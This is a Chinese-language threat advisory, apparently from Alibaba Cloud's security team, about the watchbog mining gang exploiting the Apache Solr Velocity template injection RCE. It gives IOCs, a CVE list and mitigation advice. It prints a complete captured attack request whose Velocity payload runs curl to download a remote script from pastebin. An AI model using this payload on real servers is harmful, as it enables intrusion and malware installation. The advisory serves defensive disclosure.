威胁预警|Solr velocity模板注入远程命令执行已加入watchbog武器库,漏洞修补时间窗口愈来愈短
概述
近日,阿里云安全团队监测到挖矿团伙watchbog更新了其使用的武器库,增长了最新Solr Velocity 模板注入远程命令执行漏洞的攻击方式,攻击成功后会下载门罗币挖矿程序进行牟利。建议用户及时排查自身主机是否受到影响。java
值得注意的是,此漏洞利用代码于10月31日被公布,11月2日阿里云安全团队就已发现watchbog团伙利用此漏洞进行入侵,植入木马进行挖矿,漏洞公开不足2日便被挖矿团伙利用进行攻击牟利。能够看到,当新的漏洞被披露出来时,可供企业用户修复的时间窗口愈来愈短,所以防守方须要及时地关注新披露可利用漏洞,以及采起缓解措施或进行修复,必要时可考虑选用安全产品帮助保障安全。shell
背景介绍
watchbog挖矿团伙
watchbog团伙最先出现于2018年,是一个利用多种漏洞攻击方式向目标主机植入挖矿木马的恶意团伙,经过挖取门罗币牟利并维持C&C通讯以供团伙后续动做。自出现后更新频繁,一直在尝试利用最新的漏洞进行攻击。安全
Solr Velocity 模板注入远程命令执行漏洞
Apache Solr是开源企业搜索平台,主要包括全文搜索、动态聚类、富文本处理等功能。在2019年10月31日,国外安全研究员公开了Solr Velocity模板注入的POC。此漏洞存在于Solr默认集成组件Solr.VelocityResponseWriter中,参数params.resource.loader.enabled能够控制是否根据请求参数来加载指定模板,虽然默认为false,但攻击者能够经过发送/[core_name]/config来手动设置此参数的开启,以后即可构造恶意请求执行指令。bash
攻击者首先能够经过[core_admin]获取服务器core_name,以后经过发送如下命令将加载模板指令打开。服务器
开启从参数指定模板后,攻击者即可以发送恶意代码从而进行恶意行为。curl
恶意脚本分析
11月2日,阿里云安全团队发现有攻击者利用Solr Velocity漏洞发起入侵,其会向受到此漏洞影响的主机发送如下数据:ide
GET /solr/scalebay_2/select?q=1&&wt=velocity&v.template=custom&v.template.custom=#set($x='')+#set($rt=$x.class.forName('java.lang.Runtime'))+#set($chr=$x.class.forName('java.lang.Character'))+#set($str=$x.class.forName('java.lang.String'))+#set($ex=$rt.getRuntime().exec('curl -fsSL https://pastebin.com/raw/dhQaGbMa -o /tmp/baby'))+$ex.waitFor()+#set($out=$ex.getInputStream())+#foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end HTTP/1.1
Accept-Encoding: identity
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)复制代码
跟进其使用的脚本 pastebin.com/raw/dhQaGbM…,此脚本格式内容与阿里云安全团队以前捕获的watchbog恶意脚本内容格式基本一致,(可参考以前阿里云安全针对watchbog的分析文章,参考文末相关连接),能够确认为同一团伙所为,脚本相同内容再也不赘述。除了新增了Solr Velocity攻击方式外,其新增了cleanoldpack函数用以清除旧版木马以及其余恶意团伙恶意程序,可见黑产之间的相互竞争也很是激烈。函数
其余攻击方式
| 序号 | 攻击方式 |
|---|---|
| 1 | Solr dataimport RCE(CVE-2019-0193) |
| 2 | Nexus Repository Manager(CVE_2019_5475) |
| 3 | Windows blueKeep RDP RCE (CVE-2019-0708) |
| 4 | JIRA模板注入(CVE-2019-11581) |
| 5 | Exim Mail Server 远程命令执行(CVE-2019-10149) |
| 6 | Solr 实体注入 (CVE-2017-12629) |
| 7 | Couchdb 远程命令执行(CVE-2018-8007) |
| 8 | Nexus Repository Manager 3 远程命令执行(CVE-2019-7238) |
| 9 | Jenkins 远程命令执行(CVE-2018-1000861) |
| 10 | Redis未受权访问、Redis任意lua字节码执行(CVE-2015-4335) |
IOC
pastebin[.]com/raw/dhQaGbMa
pastebin[.]com/raw/9QVpd02i
pastebin[.]com/raw/6HtLs31b网站
MD5:
9f63e1105214ea94766d8c2fe2ba0da0阿里云
安全建议
- 截止完成此稿,目前官方还未发布任何补丁,建议用户采用白名单策略限制与solr应用通讯对象,并时刻关注官方对于此漏洞的反应。
- 建议使用阿里云安全的下一代云防火墙产品,其阻断恶意外联、可以配置智能策略的功能,可以有效帮助防护入侵。哪怕攻击者在主机上的隐藏手段再高明,下载、挖矿、反弹shell这些操做,都须要进行恶意外联;云防火墙的拦截将完全阻断攻击链。此外,用户还能够经过自定义策略,直接屏蔽恶意网站,达到阻断入侵的目的。此外,云防火墙独有的虚拟补丁功能,可以帮助客户更灵活、更“无感”地阻断攻击。
- 对于有更高定制化要求的用户,能够考虑使用阿里云安全管家服务。购买服务后将有经验丰富的安全专家提供咨询服务,定制适合您的方案,帮助加固系统,预防入侵。入侵事件发生后,也可介入直接协助入侵后的清理、事件溯源等,适合有较高安全需求的用户,或未雇佣安全工程师,但但愿保障系统安全的企业。
- 1. 漏洞预警:Apache Solr 远程代码执行漏洞
- 2. CVE-2019-0193 Apache solr velocity模块漏洞&命令执行
- 3. Oracle WebLogic远程命令执行漏洞预警
- 4. Apache Solr Velocity模板注入RCE漏洞复现
- 5. Apache Solr velocity模板注入RCE漏洞复现
- 6. 【漏洞预警】Redis 4.x/5.x 远程命令执行高危漏洞
- 7. Samba远程Shell命令注入执行漏洞(CVE-2007-2447)
- 8. 漏洞预警Gitlab Wiki API 远程代码执行漏洞
- 9. 【漏洞复现】Apache Solr via Velocity template远程代码执行
- 10. Apache SSI 远程命令执行漏洞
- 更多相关文章...
- • SQLite 注入 - SQLite教程
- • ionic 模态窗口 - ionic 教程
- • YAML 入门教程
- • Docker 清理命令
-
每一个你不满意的现在,都有一个你没有努力的曾经。
- 1. 漏洞预警:Apache Solr 远程代码执行漏洞
- 2. CVE-2019-0193 Apache solr velocity模块漏洞&命令执行
- 3. Oracle WebLogic远程命令执行漏洞预警
- 4. Apache Solr Velocity模板注入RCE漏洞复现
- 5. Apache Solr velocity模板注入RCE漏洞复现
- 6. 【漏洞预警】Redis 4.x/5.x 远程命令执行高危漏洞
- 7. Samba远程Shell命令注入执行漏洞(CVE-2007-2447)
- 8. 漏洞预警Gitlab Wiki API 远程代码执行漏洞
- 9. 【漏洞复现】Apache Solr via Velocity template远程代码执行
- 10. Apache SSI 远程命令执行漏洞